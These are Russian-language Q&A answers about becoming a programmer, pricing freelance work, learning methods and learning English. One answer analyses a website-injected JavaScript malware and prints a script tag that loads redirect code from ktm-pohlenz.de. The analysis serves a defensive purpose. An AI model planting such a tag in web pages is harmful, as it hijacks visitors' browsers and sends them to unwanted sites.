• Как стать программистом?

    taliban
    @taliban
    php программист
    Для начала закончи все 5 или 6 курсов (сколько там у вас) как можно лучше, и не зубри все читая а учи (понимай). Поверь, хороший выпускник, который знает свое дело стоит на вес золота, таких практически нет и они очень ценятся. «Программистом» станешь со временем если будешь интересоваться этим дальше.
    Ответ написан
    4 комментария
  • Как стать программистом?

    Stdit
    @Stdit
    Чтобы стать программистом, который не просто пишет по гайдлайнам, но ещё и всё понимает и чувствует код, надо написать не один десяток велосипедов и сравнить свои велосипеды с велосипедами других программистов. Понять, почему твой велосипед работает хуже и написать новый велосипед.

    К примеру, несколько моих знакомых, которых я считаю хорошими программистами, жаловались, что в детстве-юности самостоятельно изобрели волновой метод поиска кратчайшего пути, решето Эратосфена, и некоторые другие известные алгоритмы, разочаровавшись позже, что это уже давно известно.

    Конечно, я не одобряю велосипеды в профессиональном программировании, но для обучения и саморазвития, по-моему, нет ничего лучше.
    Ответ написан
    1 комментарий
  • Сколько взять за Android проект "Счетчик калорий" начинающему разработчику?

    @amambaru
    Цена определяется сверху - максимумом, что согласен еще добровольно оплатить заказчик.
    Минимумом - сколько тебе нужно для проживания (продукты, квартира, интернет).

    Оптимумом: чуть больше чем ты не заработаешь, когда откажешься от другой работы, пока будешь делать эту.

    Но я студент, не работал еще (зарплату не получал). Поэтому прошу дать адекватную цену с вашей точки зрения которая будет приемлема за ~100ч работы над таким проектом.


    Адекватной цены нет.
    Адекватной является только ваша индивидуальная договоренность с заказчиком.

    Это может быть и 5000 рублей и 200 000 рублей.
    Серьезно.
    Ответ написан
    4 комментария
  • Сколько взять за Android проект "Счетчик калорий" начинающему разработчику?

    @aol-nnov
    сделай за спасибо, положи в портфолио.
    с заказчика возьми честное слово, что когда тебе потребуется положительная рекомендация, он тебе её даст.

    серьёзно.
    Ответ написан
    1 комментарий
  • Как повысить уровень программирования?

    tiabc
    @tiabc
    Бизнес-партнер и консультант по технологиям
    Хорошие разработчики постоянно развиваются и никогда не стоят на месте. Любое развитие состоит в делании дел, в решении конкретных задач и в обратной связи, которую ты получаешь от других или в результате рефлексии.

    TL;DR: Читайте книжки, делайте дела, читайте чужой код.

    Что можно начать делать прямо сейчас, чтобы стать программистом лучше?

    1. Изучайте базу. Алгоритмы, сети, криптографию, архитектуру, ос, устройство браузеров, компиляторы и т.д. Изучение подобных вещей дает понимание какие задачи бывают в реальном мире и как "большие дядьки" решают возникающие проблемы. Это кладезь инсайтов.

    2. Устройтесь на фултайм-работу с сильной командой даже если джуниором. Я считаю, что есть только один способ расти как разработчик: работать фултайм над одним бизнес-продуктом. Такой подход учит решать проблемы масштабируемости, думать заранее, работать над процессом, которому вы следуете в разработке, решать задачи, возникающие с длительной эксплуатацией, решать проблемы с удобными окружениями и вообще учиться планировать свою работу в связи с нуждами бизнеса.

    3. Написание кода - не самая большая часть работы сеньор-девелоперов, я бы сказал. Но когда речь заходит о самом коде, нужно понимать что ты пишешь и зачем. Есть классические книжки, которые можно найти, например, в матрице компетентности программиста, есть современные, но полезные типа The Art of Readable Code, которую я очень рекомендую. Нужно читать книжки. На собеседовании я всегда спрашиваю какие книжки читал или читает соискатель и если ответ отрицательный, то это большой минус.

    4. Участвуйте в опенсорс. Там вам всегда приходится сталкиваться с образом мысли самых разных людей и кодом, который они пишут. Это учит вас читать чужой код, находить в нем ошибки и критически и аргументированно к нему относиться, предлагая свои решения. Опенсорс-разработка, так же как и книжки, дает вам тот чужой опыт, который бы вы никогда сами не получили от людей, которые часто умнее или опытнее вас в чем-то. В опенсорсе, кстати, в отличие от бизнесовой разработки, есть шанс в удовольствие писать очень качественный код, в котором в бизнесе далеко не всегда есть необходимость.

    5. Наберитесь терпения. Это не случится за один день. Думайте над именованием, разделяйте обязанности, изучайте алгоритмы и экосистему, оптимизируйте ваше рабочее место, изучайте новые технологии, читайте статьи и в течение ближайших лет регулярных усилий вы обретете новый способ мышления и будете разрабатывать поддерживаемое и надежное ПО. Легкого пути, к сожалению, нет.
    Ответ написан
    2 комментария
  • Что делает этот вирус?

    27cm
    @27cm
    TODO: Написать статус
    1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
    2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
    3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

    Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:
    <script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>


    P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.
    Ответ написан
    6 комментариев
  • Лучший способ обучения?

    Fesor
    @Fesor
    Full-stack developer (Symfony, Angular)
    Лучший способ обучения, прочитать вот эту книгу: Структура и интерпритация компьютерных программ. И все что не понятно - гуглить и читать на википедии. И далее и далее. И задавать вопросы.

    более легкий и эффективный способ обучения

    Смотря что считать легким. Можно легко научиться не тому. Скажем пока вы не понимаете как информация внутри комьютера представлена, даже если вы на JS будете писать вы рискуете быстро проиграть. Это фундаментальные основы которые должен знать каждый.

    У большинства разработчиков, с которыми мне доводилось общаться, проблема именно с фундаментальными знаниями и понятиями. Самоучки, что с них взять. Я как бы и сам самоучка, но как-то меня никогда не устраивали непонятные штуки или расплывчатая терминология которую можно трактовать двояко.

    Например я сильно желею что нет предметов в университетах типа "история программирования" и т.д. где рассматривают основные идеи и предпосылки к возникновению тех или иных подходов. Вроде "зачем людям понадобилось ООП, если уже тогда было функциональное программирование".
    Ответ написан
    22 комментария
  • Лучший способ обучения?

    xmoonlight
    @xmoonlight
    https://sitecoder.blogspot.com
    Этот вопрос я задаю вам.
    Хорошо, что сказали! :)

    По теме (кратко, но доходчиво):
    ©2016
    1. Обучиться - значит уметь применять.
    2. Уметь применять - значит понимать.
    3. Понимать - уметь научить.
    ©2016
    Ответ написан
  • Лучший способ обучения?

    @AlikDex
    Как и во всем. Лучший способ это практика. То что ты там что-то пишешь вылетит из головы через неделю. А вот то, что ты закодил единожды и самостоятельно - останется с тобой на годы.
    Ответ написан
    5 комментариев
  • Как выучить английский начинающему программисту?

    @maxyc_webber
    Web-программист
    Я б еще посоветовал (В свое время мне это дало очень сильный толчек в обучении) найти способ общаться на английском с носителем. Желательно, который не знает русского языка.
    В эру популярности чатиков познакомился с каким то филлипинцем. Слово за слово, он на кривом английском, я на не менее кривом англицком изьяснялись. сразу оговорили цель общения. мол не просто языком почесать, а с целью чесать более уверенно )))
    Можно (но очень редко мне кажется ибо быстро пропадает желание) пытаться общаться с другом или родственником только на английском. например 1-2 дня в неделю. и хоть тресни. должен изьясниться только на английском или жестами. русский не юзать.
    Ответ написан
    2 комментария
  • Как выучить английский начинающему программисту?

    @jelezo
    Смотри ИТ-видео с субтитрами. Непонятные слова переводи и выписывай.
    Ответ написан
    1 комментарий